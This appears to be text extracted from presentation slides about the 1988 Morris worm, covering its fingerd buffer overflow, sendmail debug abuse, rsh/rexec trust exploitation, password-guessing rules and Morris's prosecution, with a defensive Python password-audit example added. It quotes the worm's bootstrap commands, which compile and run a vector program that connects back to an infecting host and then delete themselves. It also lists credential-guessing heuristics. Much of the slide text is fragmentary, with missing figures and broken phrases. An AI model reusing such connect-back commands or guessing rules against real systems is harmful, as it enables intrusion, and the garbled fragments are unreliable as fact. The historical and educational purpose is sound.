Transcript of MORRIS WORM
Took advantage of vulnerabilities of Unix:
PROPAGATION VIA FINGER DAEMON VULNERABILITY:
• UNIX daemon which allows users to obtain information about other users over TCP/IP
Buffer overflow vulnerability (gets()):
buffer size -
, username request -
One evening in 1988, Robert T. Morris Jr., a graduate student at Cornell University, released the first computer worm
WHAT IS WORM?
uses a network
to send copies of itself to other nodes
without any user
in widely used services
Internet was used mostly by academics to share information: among
connected to Internet
were affected by the worm
Beyond the damage caused by repeated infection, the worm
didn't damage anything
Morris Jr. was
tried under the Computer
Fraud & Abuse Act (1986)
he was sentenced to three years of probation
400 hours of community service
fine of $10,050 plus the costs of his supervision
Used password guessing and dictionary attack mechanism
Password guessing mechanism of the Morris worm was following:
1) NULL password
2) Username as the password
3) User name followed by itself : jsmithjsmith
4) Backward user name : htimsj
5) GECOS data from pw file
6) Special dictionary of known passwords, containing 432 words
7) Exstream attack:
~ 4 weeks
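Added example (not part of the original presentation): a password-change check that rejects any candidate the guessing rules 1-6 above would find. The wordlist and account lines are constructed samples, and taking GECOS guesses from the name words in the first comma-separated subfield is an assumption.

```python
import re

# Constructed stand-in for the 432-word dictionary (the real list is not on this page).
SAMPLE_WORDLIST = {"wizard", "coffee", "computer"}

# Constructed passwd(5)-style lines: name:pw:uid:gid:GECOS:home:shell
PASSWD_SAMPLE = [
    "jsmith:x:1001:1001:John Smith,Room 12,555-0100:/home/jsmith:/bin/sh",
    "adoe:x:1002:1002:Alice Doe:/home/adoe:/bin/sh",
    "bkim:x:1003:1003:Bo Kim:/home/bkim:/bin/sh",
    "cfox:x:1004:1004::/home/cfox:/bin/sh",
]
# Constructed candidate passwords submitted at password-change time.
PROPOSED = {"jsmith": "htimsj", "adoe": "Alice", "bkim": "t9#Lq2vX!pRz", "cfox": ""}

def gecos_tokens(gecos):
    """Assumption: GECOS guesses are the name words in the first subfield."""
    full_name = gecos.split(",")[0]
    return {t.lower() for t in re.findall(r"[A-Za-z]+", full_name)}

def weak_reason(username, gecos, password, wordlist=SAMPLE_WORDLIST):
    """Return the name of the first rule that would guess this password, else None."""
    user = username.lower()
    pw = password.lower()  # compare case-insensitively so the policy is stricter
    if password == "":
        return "null password"
    if pw == user:
        return "username as password"
    if pw == user + user:
        return "username doubled"
    if pw == user[::-1]:
        return "username reversed"
    if pw in gecos_tokens(gecos):
        return "GECOS data"
    if pw in wordlist:
        return "dictionary word"
    return None

def audit(passwd_lines, proposed):
    """Map each account whose proposed password is guessable to the matching rule."""
    findings = {}
    for line in passwd_lines:
        fields = line.rstrip("\n").split(":")
        if line.startswith("#") or len(fields) < 7:
            continue  # skip comments and malformed entries
        user, gecos = fields[0], fields[4]
        reason = weak_reason(user, gecos, proposed[user]) if user in proposed else None
        if reason:
            findings[user] = reason
    return findings
```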
Mailer program to route mail in a heterogeneous network.
• With the debug option, a tester can run programs to display the state of the mail system without sending mail or establishing a separate login connection
• This resulted in the worm being connected to a remote shell via the TCP connection.
are network services which offer remote command interpreters.
/etc/hosts.equiv; .rhosts (per user)
• Client IP, user ID
• Rely on a “privileged” originating port and permission files
• User ID, Password
• uses password authentication
1) passwordless rsh
4) rexec and password rsh
finger zulfiqar e example
- buffer size
cc -o x14481910 x14481910.c;
./x14481910 188.8.131.52 32341 8712440
rm -f x14481910 x14481910.c;
1 of 7 times self destruction
uses password attack
rsh = remote shell
as full search ~ 4 weeks
• Collects information on other machines in the network
• Reading public configuration files
• Running system utility program
• This vector program was 99 lines of C code that would be compiled and run on the remote machine.
• Connects back to the infecting machine, transfers the main worm binary
• Deleted automatically
What is worm?
Who created the worm, when and why?
Worm work steps
High level description
Cyber attacks affect real life (broker stocks):
"Hacked AP Twitter feed reporting fake White House attack rocks markets" (2013)
torrents, Deep Web ...